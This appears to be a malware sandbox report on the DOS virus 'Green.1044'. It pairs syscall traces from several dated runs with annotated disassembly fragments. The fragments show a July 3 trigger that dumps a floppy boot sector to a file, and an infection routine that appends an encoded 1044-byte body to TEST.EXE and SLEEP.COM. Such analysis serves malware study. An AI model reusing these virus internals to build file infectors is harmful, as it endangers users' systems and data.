Sample viewer

vx.netlux.org/Virus.DOS.Green.1044


Syscalls:

Time  Syscall Op  PC | Syscall Name
2018-12-17T21:50:38.559443441Z 26 PC: 12ab7 | Set disk transfer address
2018-12-17T21:50:38.561662724Z 71 PC: 12ac1 | Get current directory
2018-12-17T21:50:38.564378312Z 53 PC: 12ac6 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T21:50:38.565459595Z 37 PC: 12ada | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T21:50:38.566677611Z 42 PC: 12ae0 | Get date
  0x12ae0: cmp dh, 7                      ; INT 21h AH=2Ah returns DH = month, DL = day
  0x12ae3: je 0x12ae8                     ; month == 7 (July)?
  0x12ae5: jmp 0x12b8b                    ; not July: jump past the payload (trace continues with Find first file)
  0x12ae8: cmp dl, 3
  0x12aeb: je 0x12af0                     ; day == 3?
  0x12aed: jmp 0x12b8b                    ; not the 3rd: jump past the payload
  0x12af0: mov ax, 0x201                  ; INT 13h AH=02h read sectors, AL=1 sector
  0x12af3: mov cx, 1                      ; CH=0 cylinder 0, CL=1 first sector
  0x12af6: xor dx, dx                     ; DH=0 head 0, DL=0 first floppy drive
  0x12af8: lea bx, word ptr [bp + 0x4fc]  ; ES:BX = 512-byte buffer
  0x12afc: int 0x13                       ; BIOS disk read (not a DOS call, so it does not appear in the syscall list)
  0x12afe: mov ah, 0x3c                   ; INT 21h AH=3Ch create or truncate file
  0x12b00: xor cx, cx                     ; CX=0: normal file attributes
  0x12b02: lea dx, word ptr [bp + 0x209]  ; DS:DX = filename (string not included in the trace)
  0x12b06: int 0x21
  0x12b08: jb 0x12b28                     ; CF set on error
  0x12b0a: xchg ax, bx                    ; BX = new file handle
  0x12b0b: mov ah, 0x40                   ; INT 21h AH=40h write to handle
  0x12b0d: mov cx, 0x200                  ; 512 bytes = the sector just read
  0x12b10: lea dx, word ptr [bp + 0x4fc]  ; DS:DX = the sector buffer
2018-12-17T21:50:38.569052133Z 78 PC: 12bc6 | Find first file
2018-12-17T21:50:38.57464322Z 67 PC: 12cf8 | Get or set file attributes
2018-12-17T21:50:38.581202619Z 67 PC: 12d17 | Get or set file attributes
2018-12-17T21:50:38.595658536Z 61 PC: 12d27 | Open file (Filename = 'TEST.EXE')
2018-12-17T21:50:38.601906023Z 63 PC: 12d44 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T21:50:38.607983729Z 66 PC: 12c65 | Move file pointer
2018-12-17T21:50:38.610312582Z 66 PC: 12c65 | Move file pointer
2018-12-17T21:50:38.611507315Z 64 PC: 12deb | Write file or device (Write 26 bytes on handle 5)
2018-12-17T21:50:38.613883711Z 66 PC: 12c65 | Move file pointer
2018-12-17T21:50:38.616010289Z 44 PC: 12dfe | Get time
  0x12dfe: mov byte ptr [bp + 0x415], dl  ; INT 21h AH=2Ch returns DL = hundredths of a second; saved as a one-byte value
  0x12e02: call 0x12e27                   ; the two routines run once before the write...
  0x12e05: call 0x12e40
  0x12e08: mov cx, 0x414                  ; 0x414 = 1044 bytes, matching the 'Write 1044 bytes' entry that follows
  0x12e0b: mov ah, 0x40                   ; INT 21h AH=40h write to handle
  0x12e0d: lea dx, word ptr [bp + 4]      ; DS:DX = start of the 1044-byte body
  0x12e11: int 0x21
  0x12e13: call 0x12e40                   ; ...and once after it, in reverse order (consistent with transform-before-write, restore-after-write)
  0x12e16: call 0x12e27
  0x12e19: pop ax
  0x12e1a: mov byte ptr [bp + 0x215], al
  0x12e1e: call 0x22b9d
  0x12e21: call 0x22bab
  0x12e24: jmp 0x12bdf
  0x12e27: cld                            ; start of the routine called around the write
  0x12e28: mov ax, cs
  0x12e2a: mov es, ax                     ; ES = CS
  0x12e2c: mov ah, byte ptr [bp + 0x415]  ; AH = the saved time byte
  0x12e30: mov cx, 0x390                  ; CX = 0x390 bytes to process
  0x12e33: lea si, word ptr [bp + 0x32]   ; SI = body offset 0x32 (the loop itself is not included in the trace)
2018-12-17T21:50:38.618333914Z 64 PC: 12e13 | Write file or device (Write 1044 bytes on handle 5)
2018-12-17T21:50:38.627997117Z 87 PC: 12baa | Get or set file date and time
2018-12-17T21:50:38.629818265Z 62 PC: 12baf | Close file
2018-12-17T21:50:38.640924694Z 67 PC: 12bbc | Get or set file attributes
2018-12-17T21:50:38.650060422Z 59 PC: 12be7 | Change current directory
2018-12-17T21:50:38.654845508Z 78 PC: 12bc6 | Find first file
2018-12-17T21:50:38.66106741Z 67 PC: 12cf8 | Get or set file attributes
2018-12-17T21:50:38.666464956Z 67 PC: 12d17 | Get or set file attributes
2018-12-17T21:50:38.676829811Z 61 PC: 12d27 | Open file (Filename = 'SLEEP.COM')
2018-12-17T21:50:38.683231324Z 66 PC: 12c65 | Move file pointer
2018-12-17T21:50:38.684511414Z 66 PC: 12c80 | Move file pointer
2018-12-17T21:50:38.68683475Z 63 PC: 12c8b | Read file or device (Read 1 bytes on handle 5)
2018-12-17T21:50:38.69307017Z 66 PC: 12c65 | Move file pointer
2018-12-17T21:50:38.694239252Z 63 PC: 12cae | Read file or device (Read 3 bytes on handle 5)
2018-12-17T21:50:38.697201974Z 66 PC: 12c65 | Move file pointer
2018-12-17T21:50:38.698465119Z 66 PC: 12c65 | Move file pointer
2018-12-17T21:50:38.699720346Z 64 PC: 12cd7 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:50:38.702818285Z 66 PC: 12c65 | Move file pointer
2018-12-17T21:50:38.704538357Z 44 PC: 12dfe | Get time
  0x12dfe: mov byte ptr [bp + 0x415], dl
  0x12e02: call 0x12e27
  0x12e05: call 0x12e40
  0x12e08: mov cx, 0x414
  0x12e0b: mov ah, 0x40
  0x12e0d: lea dx, word ptr [bp + 4]
  0x12e11: int 0x21
  0x12e13: call 0x12e40
  0x12e16: call 0x12e27
  0x12e19: pop ax
  0x12e1a: mov byte ptr [bp + 0x215], al
  0x12e1e: call 0x22b9d
  0x12e21: call 0x22bab
  0x12e24: jmp 0x12bdf
  0x12e27: cld
  0x12e28: mov ax, cs
  0x12e2a: mov es, ax
  0x12e2c: mov ah, byte ptr [bp + 0x415]
  0x12e30: mov cx, 0x390
  0x12e33: lea si, word ptr [bp + 0x32]
2018-12-17T21:50:38.707251037Z 64 PC: 12e13 | Write file or device (Write 1044 bytes on handle 5)
2018-12-17T21:50:38.715206152Z 87 PC: 12baa | Get or set file date and time
2018-12-17T21:50:38.71651002Z 62 PC: 12baf | Close file
2018-12-17T21:50:38.721308107Z 67 PC: 12bbc | Get or set file attributes
2018-12-17T21:50:38.727617225Z 59 PC: 12be7 | Change current directory
2018-12-17T21:50:38.731515077Z 37 PC: 12bfb | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T21:50:38.732416744Z 26 PC: 12c17 | Set disk transfer address
2018-12-17T21:50:38.733368526Z 76 PC: 12a44 | Terminate with return code (Return code = '164')

{"DateBased":true,"Day":3,"Month":7,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":27,"SideJobID":0}


Syscalls:

Time  Syscall Op  PC | Syscall Name
2018-12-25T11:39:45.259087143Z 26 PC: 12ab7 | Set disk transfer address
2018-12-25T11:39:45.260921371Z 71 PC: 12ac1 | Get current directory
2018-12-25T11:39:45.264035237Z 53 PC: 12ac6 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:39:45.265240351Z 37 PC: 12ada | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:39:45.266957788Z 42 PC: 12ae0 | Get date
  0x12ae0: cmp dh, 7
  0x12ae3: je 0x12ae8
  0x12ae5: jmp 0x12b8b
  0x12ae8: cmp dl, 3
  0x12aeb: je 0x12af0
  0x12aed: jmp 0x12b8b
  0x12af0: mov ax, 0x201
  0x12af3: mov cx, 1
  0x12af6: xor dx, dx
  0x12af8: lea bx, word ptr [bp + 0x4fc]
  0x12afc: int 0x13
  0x12afe: mov ah, 0x3c
  0x12b00: xor cx, cx
  0x12b02: lea dx, word ptr [bp + 0x209]
  0x12b06: int 0x21
  0x12b08: jb 0x12b28
  0x12b0a: xchg ax, bx
  0x12b0b: mov ah, 0x40
  0x12b0d: mov cx, 0x200
  0x12b10: lea dx, word ptr [bp + 0x4fc]
2018-12-25T11:39:45.271507281Z 60 PC: 12b08 | Create or truncate file
2018-12-25T11:39:46.194887355Z 64 PC: 12b16 | Write file or device (Write 512 bytes on handle 5)
2018-12-25T11:39:46.275503856Z 62 PC: 12b1a | Close file
2018-12-25T11:39:48.670249201Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T11:39:48.671616422Z 72 PC: 8f1bd | Allocate memory
2018-12-25T11:39:48.674197493Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T11:39:48.677531381Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T11:39:48.689707071Z 66 PC: 91f95 | Move file pointer
2018-12-25T11:39:48.691593402Z 62 PC: 91fc1 | Close file
2018-12-25T11:39:48.694782577Z 75 PC: 91fe0 | Execute program
2018-12-25T11:39:48.712669061Z 98 PC: 916f1 | Get current PSP
2018-12-25T11:39:48.714058318Z 9 PC: c605 | Display string (String= '6r&;] u')
2018-12-25T11:39:48.720061802Z 48 PC: c609 | Get DOS version
2018-12-25T11:39:48.723705241Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T11:39:48.726694372Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T11:39:48.730447834Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T11:39:48.734649826Z 9 PC: c6d9 | Display string (String= 'VHVD[email protected]_Kut1Dt a1ZW 5|(Nj(p^')
2018-12-25T11:39:48.738913364Z 9 PC: c6e0 | Display string (String= '5|(Nj(p^')
2018-12-25T11:39:48.744557961Z 61 PC: 91f88 | Open file (See above)
2018-12-25T11:39:48.75911Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T11:39:48.760853856Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T11:39:48.763473241Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T11:39:48.789389612Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T11:39:48.794149116Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T11:39:48.79564467Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T11:39:48.798066767Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T11:39:48.800413784Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:39:48.802046132Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:39:48.804672139Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T11:39:48.813653693Z 62 PC: 8f8eb | Close file
2018-12-25T11:39:48.815659426Z 62 PC: 8f8f2 | Close file
2018-12-25T11:39:48.818344998Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.820002815Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.821499605Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.822941806Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.824829199Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.826518721Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.828197165Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.830351706Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.831897534Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.833535816Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.844076699Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.845846819Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.847466468Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.849905756Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.851676261Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.853590153Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.856677278Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.85863275Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.860553943Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.862623904Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.864767017Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.866632947Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.868522642Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.870860462Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.872756792Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.874620788Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.876795533Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.878389919Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.879949275Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.8819567Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T11:39:48.887496728Z 62 PC: 8f90e | Close file
2018-12-25T11:39:48.890633156Z 69 PC: 8f915 | Duplicate handle
2018-12-25T11:39:48.893032401Z 69 PC: 8f919 | Duplicate handle
2018-12-25T11:39:48.894827043Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T11:39:48.899845067Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T11:39:48.902262119Z 61 PC: 9387b | Open file (See above)
2018-12-25T11:39:48.907856128Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T11:39:48.910127894Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T11:39:48.912484546Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T11:39:48.913752614Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T11:39:48.914877321Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T11:39:48.919180845Z 72 PC: 8fa02 | Allocate memory
2018-12-25T11:39:48.921922858Z 72 PC: 8fa06 | Allocate memory
2018-12-25T11:39:48.923502897Z 73 PC: 8fa11 | Release memory
2018-12-25T11:39:48.925391682Z 73 PC: 8efea | Release memory
2018-12-25T11:39:48.928650493Z 74 PC: 8f003 | Reallocate memory
2018-12-25T11:39:48.930712766Z 72 PC: 8f054 | Allocate memory
2018-12-25T11:39:48.935446422Z 72 PC: 8f058 | Allocate memory
2018-12-25T11:39:48.937290435Z 73 PC: 8f060 | Release memory
2018-12-25T11:39:48.938659638Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T11:39:48.949174537Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:39:48.955926998Z 66 PC: 8f0ad | Move file pointer
2018-12-25T11:39:48.957922425Z 62 PC: 8f0d1 | Close file
2018-12-25T11:39:48.960478369Z 75 PC: 8f0f2 | Execute program
2018-12-25T11:39:48.985448707Z 80 PC: 12be9 | Set current PSP
2018-12-25T11:39:48.986364612Z 48 PC: 12bee | Get DOS version
2018-12-25T11:39:48.987951312Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T11:39:48.990603511Z 101 PC: 12c74 | Get extended country info
2018-12-25T11:39:48.991949222Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T11:39:48.993269757Z 74 PC: 12cdc | Reallocate memory
2018-12-25T11:39:48.996058216Z 72 PC: 1355d | Allocate memory
2018-12-25T11:39:48.997752807Z 25 PC: 13596 | Get default drive
2018-12-25T11:39:48.99890613Z 71 PC: 135ad | Get current directory
2018-12-25T11:39:49.002419416Z 59 PC: 135ba | Change current directory
2018-12-25T11:39:49.00849461Z 59 PC: 135c8 | Change current directory
2018-12-25T11:39:49.015043159Z 59 PC: 135d3 | Change current directory
2018-12-25T11:39:49.019535537Z 25 PC: 12d13 | Get default drive
2018-12-25T11:39:49.020935821Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T11:39:49.02221159Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T11:39:49.024536544Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:39:49.026981601Z 80 PC: 1301d | Set current PSP
2018-12-25T11:39:49.027983181Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T11:39:49.030608395Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:39:49.031965212Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:39:49.033293029Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T11:39:49.035525807Z 72 PC: 130ec | Allocate memory
2018-12-25T11:39:49.037612162Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T11:39:49.045140589Z 62 PC: 131ba | Close file
2018-12-25T11:39:49.047569752Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T11:39:49.057085356Z 74 PC: 1197c | Reallocate memory
2018-12-25T11:39:49.058834158Z 72 PC: 11991 | Allocate memory
2018-12-25T11:39:49.060895269Z 73 PC: 119b2 | Release memory
2018-12-25T11:39:49.062754204Z 72 PC: 119bd | Allocate memory
2018-12-25T11:39:49.064502116Z 73 PC: 119df | Release memory
2018-12-25T11:39:49.066075247Z 72 PC: 119f5 | Allocate memory
2018-12-25T11:39:49.06875756Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":27,"SideJobID":0}


Syscalls:

Time  Syscall Op  PC | Syscall Name
2018-12-25T11:39:45.438840372Z 26 PC: 12ab7 | Set disk transfer address
2018-12-25T11:39:45.440427839Z 71 PC: 12ac1 | Get current directory
2018-12-25T11:39:45.443768721Z 53 PC: 12ac6 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:39:45.445330451Z 37 PC: 12ada | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:39:45.447228742Z 42 PC: 12ae0 | Get date
  0x12ae0: cmp dh, 7
  0x12ae3: je 0x12ae8
  0x12ae5: jmp 0x12b8b
  0x12ae8: cmp dl, 3
  0x12aeb: je 0x12af0
  0x12aed: jmp 0x12b8b
  0x12af0: mov ax, 0x201
  0x12af3: mov cx, 1
  0x12af6: xor dx, dx
  0x12af8: lea bx, word ptr [bp + 0x4fc]
  0x12afc: int 0x13
  0x12afe: mov ah, 0x3c
  0x12b00: xor cx, cx
  0x12b02: lea dx, word ptr [bp + 0x209]
  0x12b06: int 0x21
  0x12b08: jb 0x12b28
  0x12b0a: xchg ax, bx
  0x12b0b: mov ah, 0x40
  0x12b0d: mov cx, 0x200
  0x12b10: lea dx, word ptr [bp + 0x4fc]
2018-12-25T11:39:45.461663402Z 78 PC: 12bc6 | Find first file
2018-12-25T11:39:45.468440894Z 67 PC: 12cf8 | Get or set file attributes
2018-12-25T11:39:45.474689498Z 67 PC: 12d17 | Get or set file attributes
2018-12-25T11:39:46.194701712Z 61 PC: 12d27 | Open file (Filename = 'TEST.EXE')
2018-12-25T11:39:46.207717805Z 63 PC: 12d44 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:39:46.214924186Z 66 PC: 12c65 | Move file pointer
2018-12-25T11:39:46.217922889Z 66 PC: 12c65 | Move file pointer (See above)
2018-12-25T11:39:46.220648854Z 64 PC: 12deb | Write file or device (Write 26 bytes on handle 5)
2018-12-25T11:39:46.22398681Z 66 PC: 12c65 | Move file pointer (See above)
2018-12-25T11:39:46.226468614Z 44 PC: 12dfe | Get time
  0x12dfe: mov byte ptr [bp + 0x415], dl
  0x12e02: call 0x12e27
  0x12e05: call 0x12e40
  0x12e08: mov cx, 0x414
  0x12e0b: mov ah, 0x40
  0x12e0d: lea dx, word ptr [bp + 4]
  0x12e11: int 0x21
  0x12e13: call 0x12e40
  0x12e16: call 0x12e27
  0x12e19: pop ax
  0x12e1a: mov byte ptr [bp + 0x215], al
  0x12e1e: call 0x22b9d
  0x12e21: call 0x22bab
  0x12e24: jmp 0x12bdf
  0x12e27: cld
  0x12e28: mov ax, cs
  0x12e2a: mov es, ax
  0x12e2c: mov ah, byte ptr [bp + 0x415]
  0x12e30: mov cx, 0x390
  0x12e33: lea si, word ptr [bp + 0x32]
2018-12-25T11:39:46.229444019Z 64 PC: 12e13 | Write file or device (Write 1044 bytes on handle 5)
2018-12-25T11:39:46.275311537Z 87 PC: 12baa | Get or set file date and time
2018-12-25T11:39:46.282091247Z 62 PC: 12baf | Close file
2018-12-25T11:39:46.319728319Z 67 PC: 12bbc | Get or set file attributes
2018-12-25T11:39:46.422984271Z 59 PC: 12be7 | Change current directory
2018-12-25T11:39:46.427831476Z 78 PC: 12bc6 | Find first file (See above)
2018-12-25T11:39:46.434879972Z 67 PC: 12cf8 | Get or set file attributes (See above)
2018-12-25T11:39:46.446314316Z 67 PC: 12d17 | Get or set file attributes (See above)
2018-12-25T11:39:46.480618603Z 61 PC: 12d27 | Open file (See above)
2018-12-25T11:39:46.488968412Z 66 PC: 12c65 | Move file pointer (See above)
2018-12-25T11:39:46.490753204Z 66 PC: 12c80 | Move file pointer
2018-12-25T11:39:46.492414821Z 63 PC: 12c8b | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:39:46.502228937Z 66 PC: 12c65 | Move file pointer (See above)
2018-12-25T11:39:46.504364382Z 63 PC: 12cae | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:39:46.507894893Z 66 PC: 12c65 | Move file pointer (See above)
2018-12-25T11:39:46.511178135Z 66 PC: 12c65 | Move file pointer (See above)
2018-12-25T11:39:46.512849854Z 64 PC: 12cd7 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:39:46.516015483Z 66 PC: 12c65 | Move file pointer (See above)
2018-12-25T11:39:46.518622813Z 44 PC: 12dfe | Get time (See above)
2018-12-25T11:39:46.521638928Z 64 PC: 12e13 | Write file or device (See above)
2018-12-25T11:39:46.551569725Z 87 PC: 12baa | Get or set file date and time (See above)
2018-12-25T11:39:46.553970648Z 62 PC: 12baf | Close file (See above)
2018-12-25T11:39:46.588835793Z 67 PC: 12bbc | Get or set file attributes (See above)
2018-12-25T11:39:46.627489995Z 59 PC: 12be7 | Change current directory (See above)
2018-12-25T11:39:46.631962605Z 37 PC: 12bfb | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:39:46.634144974Z 26 PC: 12c17 | Set disk transfer address
2018-12-25T11:39:46.635847733Z 76 PC: 12a44 | Terminate with return code (Return code = '164')

{"DateBased":true,"Day":1,"Month":7,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":27,"SideJobID":0}


Syscalls:

Time  Syscall Op  PC | Syscall Name
2018-12-25T11:39:45.640532833Z 26 PC: 12ab7 | Set disk transfer address
2018-12-25T11:39:45.641645605Z 71 PC: 12ac1 | Get current directory
2018-12-25T11:39:45.644051809Z 53 PC: 12ac6 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:39:45.645262748Z 37 PC: 12ada | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:39:45.646334972Z 42 PC: 12ae0 | Get date
  0x12ae0: cmp dh, 7
  0x12ae3: je 0x12ae8
  0x12ae5: jmp 0x12b8b
  0x12ae8: cmp dl, 3
  0x12aeb: je 0x12af0
  0x12aed: jmp 0x12b8b
  0x12af0: mov ax, 0x201
  0x12af3: mov cx, 1
  0x12af6: xor dx, dx
  0x12af8: lea bx, word ptr [bp + 0x4fc]
  0x12afc: int 0x13
  0x12afe: mov ah, 0x3c
  0x12b00: xor cx, cx
  0x12b02: lea dx, word ptr [bp + 0x209]
  0x12b06: int 0x21
  0x12b08: jb 0x12b28
  0x12b0a: xchg ax, bx
  0x12b0b: mov ah, 0x40
  0x12b0d: mov cx, 0x200
  0x12b10: lea dx, word ptr [bp + 0x4fc]
2018-12-25T11:39:45.64829849Z 78 PC: 12bc6 | Find first file
2018-12-25T11:39:45.65224208Z 67 PC: 12cf8 | Get or set file attributes
2018-12-25T11:39:45.658458758Z 67 PC: 12d17 | Get or set file attributes
2018-12-25T11:39:46.195883327Z 61 PC: 12d27 | Open file (Filename = 'TEST.EXE')
2018-12-25T11:39:46.204224889Z 63 PC: 12d44 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:39:46.207575778Z 66 PC: 12c65 | Move file pointer
2018-12-25T11:39:46.212607329Z 66 PC: 12c65 | Move file pointer (See above)
2018-12-25T11:39:46.214073648Z 64 PC: 12deb | Write file or device (Write 26 bytes on handle 5)
2018-12-25T11:39:46.216877378Z 66 PC: 12c65 | Move file pointer (See above)
2018-12-25T11:39:46.218242448Z 44 PC: 12dfe | Get time
  0x12dfe: mov byte ptr [bp + 0x415], dl
  0x12e02: call 0x12e27
  0x12e05: call 0x12e40
  0x12e08: mov cx, 0x414
  0x12e0b: mov ah, 0x40
  0x12e0d: lea dx, word ptr [bp + 4]
  0x12e11: int 0x21
  0x12e13: call 0x12e40
  0x12e16: call 0x12e27
  0x12e19: pop ax
  0x12e1a: mov byte ptr [bp + 0x215], al
  0x12e1e: call 0x22b9d
  0x12e21: call 0x22bab
  0x12e24: jmp 0x12bdf
  0x12e27: cld
  0x12e28: mov ax, cs
  0x12e2a: mov es, ax
  0x12e2c: mov ah, byte ptr [bp + 0x415]
  0x12e30: mov cx, 0x390
  0x12e33: lea si, word ptr [bp + 0x32]
2018-12-25T11:39:46.221432484Z 64 PC: 12e13 | Write file or device (Write 1044 bytes on handle 5)
2018-12-25T11:39:46.275701825Z 87 PC: 12baa | Get or set file date and time
2018-12-25T11:39:46.277518295Z 62 PC: 12baf | Close file
2018-12-25T11:39:46.319163186Z 67 PC: 12bbc | Get or set file attributes
2018-12-25T11:39:46.337687104Z 59 PC: 12be7 | Change current directory
2018-12-25T11:39:46.342106469Z 78 PC: 12bc6 | Find first file (See above)
2018-12-25T11:39:46.349305476Z 67 PC: 12cf8 | Get or set file attributes (See above)
2018-12-25T11:39:46.355607518Z 67 PC: 12d17 | Get or set file attributes (See above)
2018-12-25T11:39:46.376632082Z 61 PC: 12d27 | Open file (See above)
2018-12-25T11:39:46.403744905Z 66 PC: 12c65 | Move file pointer (See above)
2018-12-25T11:39:46.405295007Z 66 PC: 12c80 | Move file pointer
2018-12-25T11:39:46.406737183Z 63 PC: 12c8b | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:39:46.417508766Z 66 PC: 12c65 | Move file pointer (See above)
2018-12-25T11:39:46.419309314Z 63 PC: 12cae | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:39:46.422337245Z 66 PC: 12c65 | Move file pointer (See above)
2018-12-25T11:39:46.427523226Z 66 PC: 12c65 | Move file pointer (See above)
2018-12-25T11:39:46.429074897Z 64 PC: 12cd7 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:39:46.431983811Z 66 PC: 12c65 | Move file pointer (See above)
2018-12-25T11:39:46.433789885Z 44 PC: 12dfe | Get time (See above)
2018-12-25T11:39:46.437683316Z 64 PC: 12e13 | Write file or device (See above)
2018-12-25T11:39:46.465636124Z 87 PC: 12baa | Get or set file date and time (See above)
2018-12-25T11:39:46.467633653Z 62 PC: 12baf | Close file (See above)
2018-12-25T11:39:46.527064135Z 67 PC: 12bbc | Get or set file attributes (See above)
2018-12-25T11:39:46.589021518Z 59 PC: 12be7 | Change current directory (See above)
2018-12-25T11:39:46.59512583Z 37 PC: 12bfb | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:39:46.616578726Z 26 PC: 12c17 | Set disk transfer address
2018-12-25T11:39:46.618328951Z 76 PC: 12a44 | Terminate with return code (Return code = '164')